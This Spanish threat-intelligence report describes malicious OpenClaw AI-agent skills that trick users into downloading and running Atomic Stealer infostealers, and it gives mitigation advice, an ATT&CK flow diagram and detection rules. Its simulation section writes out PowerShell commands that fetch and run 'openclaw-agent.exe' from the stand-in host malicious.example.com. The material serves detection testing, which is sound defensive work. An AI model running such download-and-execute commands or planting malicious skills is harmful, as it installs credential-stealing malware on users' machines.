De Automatización a Infección: Cómo Se Están Armando las Habilidades del Agente OpenClaw AI
Seguir
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
El artículo explica cómo se están utilizando habilidades maliciosas de OpenClaw como un mecanismo de entrega de malware para los usuarios de la plataforma de agentes de IA autoalojada. Los actores de amenazas publican habilidades que parecen inofensivas, pero que finalmente llevan a las víctimas a descargar y ejecutar binarios controlados por los atacantes desde fuentes externas. Las cargas observadas incluyen ejecutables de Windows y archivos Mach-O de macOS que se han identificado como variantes de la familia de infostealers Atomic Stealer. Esta actividad introduce un riesgo práctico en la cadena de suministro para estaciones de trabajo personales y de desarrolladores que dependen de habilidades proporcionadas por la comunidad.
Investigación
VirusTotal Code Insight revisó más de tres mil habilidades de OpenClaw y obtuvo cientos que presentaban comportamiento malicioso o de alto riesgo. En un ejemplo, una habilidad subida por hightower6eu proporcionó instrucciones paso a paso para descargar un archivo ZIP protegido con contraseña desde GitHub (contraseña: openclaw) y ejecutar openclaw-agent.exe en Windows. En macOS, la misma habilidad dirigía a los usuarios a recuperar un script codificado en Base64 desde glot.io, que luego descargaba un ejecutable Mach-O para su ejecución. Los binarios resultantes fueron detectados por múltiples motores de seguridad como infostealers troyanizados.
Mitigación
Tratar los repositorios de habilidades como código no confiable y ejecutar OpenClaw en un entorno aislado o fuertemente limitado. Evitar copiar comandos de descripciones de habilidades y no ejecutar binarios recuperados de enlaces externos no verificados. Para operadores de mercado y comunidad, implementar escaneo en el momento de la publicación enfocado en el comportamiento de descarga remota, lógica de scripts ofuscados e indicadores de robo de credenciales o exfiltración de datos. En entornos empresariales, educar a los usuarios sobre los riesgos de instalar habilidades desarrolladas por la comunidad y requerir revisión antes de su uso.
Respuesta
Buscar paquetes de habilidades de OpenClaw que hagan referencia a URLs de descarga externa, archivos protegidos por contraseña o escaladores de comandos codificados. Alertar sobre la ejecución de binarios desconocidos llamados openclaw-agent.exe y sobre lanzamientos sospechosos de Mach-O que siguen actividades de descarga de scripts. Bloquear la conectividad a dominios maliciosos conocidos y aislar los sistemas afectados para realizar un examen forense para confirmar si ocurrió la ejecución del infostealer y la exposición de credenciales.
«graph TB %% Class definitions section classDef technique fill:#99ccff classDef malware fill:#ff9999 classDef process fill:#ffcc99 %% Technique nodes tech_software_extensions[«<b>Technique</b> – T1176 Software Extensions<br/><b>Description</b>: El adversario publica extensiones o paquetes maliciosos en un mercado para disfrazar el malware como funcionalidad legítima.»] class tech_software_extensions technique tech_user_execution[«<b>Technique</b> – T1204.002 User Execution: Malicious File<br/><b>Description</b>: La víctima es engañada para ejecutar un archivo malicioso que descarga y ejecuta cargas adicionales.»] class tech_user_execution technique tech_embedded_payloads[«<b>Technique</b> – T1027.009 Embedded Payloads<br/><b>Description</b>: El código malicioso se oculta dentro de otros archivos o scripts para evadir la detección.»] class tech_embedded_payloads technique tech_polymorphic_code[«<b>Technique</b> – T1027.014 Polymorphic Code<br/><b>Description</b>: El código muta su apariencia mientras retiene funcionalidad para evadir defensas.»] class tech_polymorphic_code technique tech_decode[«<b>Technique</b> – T1140 Deobfuscate/Decode Files or Information<br/><b>Description</b>: La víctima decodifica o desencripta cargas ofuscadas antes de la ejecución.»] class tech_decode technique tech_content_injection[«<b>Technique</b> – T1659 Content Injection<br/><b>Description</b>: El adversario inyecta contenido malicioso como enlaces de descarga o scripts en un flujo de trabajo legítimo.»] class tech_content_injection technique %% Malware / payload nodes malware_infostealer[«<b>Malware</b> – Infostealer Trojan<br/><b>Description</b>: Recoge credenciales, historial de navegación y otros datos sensibles del sistema de la víctima.»] class malware_infostealer malware %% Process nodes proc_download_execute[«<b>Process</b> – Download and Execute External Binary<br/><b>Description</b>: Los comandos recuperados de la habilidad descargan binarios adicionales y los lanzan.»] class proc_download_execute process proc_decode_execute[«<b>Process</b> – Decode and Execute Payload<br/><b>Description</b>: El script codificado en Base64 se decodifica y el troyano resultante se ejecuta.»] class proc_decode_execute process %% Connections showing attack flow tech_software_extensions u002du002d>|leads_to| tech_user_execution tech_user_execution u002du002d>|triggers| proc_download_execute proc_download_execute u002du002d>|contains| tech_embedded_payloads proc_download_execute u002du002d>|contains| tech_polymorphic_code proc_download_execute u002du002d>|enables| tech_decode tech_decode u002du002d>|facilitates| proc_decode_execute proc_decode_execute u002du002d>|executes| malware_infostealer malware_infostealer u002du002d>|enables| tech_content_injection «
Flujo de Ataque
Detecciones
Posible Manipulación de Cadenas Codificadas en Base64 [MacOS] (via cmdline)
Ver
Intento de Ejecución de Curl Sospechoso [MacOS] (via cmdline)
Ver
Se Limpiaron los Atributos de la Carpeta Temporal de Xattr en MacOS (via process_creation)
Ver
Posible Infiltración / Exfiltración de Datos / C2 a través de Servicios / Herramientas de Terceros (via proxy)
Ver
Posible Infiltración / Exfiltración de Datos / C2 a través de Servicios / Herramientas de Terceros (via dns)
Ver
IOCs (HashSha256) para detectar: De la Automatización a la Infección: Cómo se Están Armandando las Habilidades de los Agentes de IA OpenClaw
Ver
Ejecución de Cargas Maliciosas vía Habilidades de OpenClaw [Creación de Procesos en Linux]
Ver
Detección de Ejecución Maliciosa del Agente de OpenClaw [Creación de Procesos en Windows]
Ver
Ejecución de Simulación
Requisito previo: El chequeo previo de Telemetría y Línea Base debe haber pasado.
Razonamiento: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente las TTPs identificadas y apuntar a generar la telemetría exacta esperada por la lógica de detección.
-
Narrativa de Ataque y Comandos:
Un atacante ha obtenido acceso inicial a la estación de trabajo de una víctima y deja caer el binario maliciosoopenclaw-agent.exeen el directorio temporal del usuario. El binario se ejecuta con una línea de comandos que contiene explícitamente las palabras clavedescargarandejecutarpara extraer cargas adicionales de un servidor C2 no confiable y ejecutarlas en memoria. El atacante usa un símbolo del sistema estándar de Windows para evitar detecciones específicas de PowerShell, coincidiendo así con las expectativas de la regla Sigma.- Dejar caer la carga:
$malPath = "$env:TEMPopenclaw-agent.exe" Invoke-WebRequest -Uri "http://malicious.example.com/openclaw-agent.exe" -OutFile $malPath - Ejecutar con argumentos sospechosos:
"%TEMP%openclaw-agent.exe" download http://malicious.example.com/payload.bin execute - El agente contacta con el servidor C2, descarga
payload.bin, lo escribe en el disco y lo lanza, mientras la línea de comandos del proceso original aún contiene las palabras desencadenantes.
- Dejar caer la carga:
-
Script de Prueba de Regresión:
# ----------------------------------------------------------------------- # OpenClaw Agent Execution Simulation – triggers Sigma detection # ----------------------------------------------------------------------- # 1. Descargar el agente malicioso (simulado con un archivo inofensivo) $agentUrl = "https://github.com/microsoft/PowerShell/releases/download/v7.4.0/powershell-7.4.0-win-x64.msi" # archivo inofensivo de marcador de posición $agentPath = "$env:TEMPopenclaw-agent.exe" Invoke-WebRequest -Uri $agentUrl -OutFile $agentPath # 2. Ejecutar el agente con las palabras clave esperadas en la línea de comandos $cmd = "`"$agentPath`" download http://malicious.example.com/payload.bin execute" Write-Host "Executing: $cmd" Start-Process -FilePath $agentPath -ArgumentList "download http://malicious.example.com/payload.bin execute" -NoNewWindow -Wait # 3. Opcional: Simular la descarga de la carga (stub inofensivo) $payloadUrl = "https://raw.githubusercontent.com/EbookFoundation/free-programming-books/master/books/free-programming-books.md" $payloadPath = "$env:TEMPpayload.bin" Invoke-WebRequest -Uri $payloadUrl -OutFile $payloadPath Write-Host "Simulation complete. Check SIEM for detection." -
Comandos de Limpieza:
# Remover todos los artefactos creados durante la simulación $paths = @( "$env:TEMPopenclaw-agent.exe", "$env:TEMPpayload.bin" ) foreach ($p in $paths) { if (Test-Path $p) { Remove-Item -Path $p -Force Write-Host "Deleted $p" } }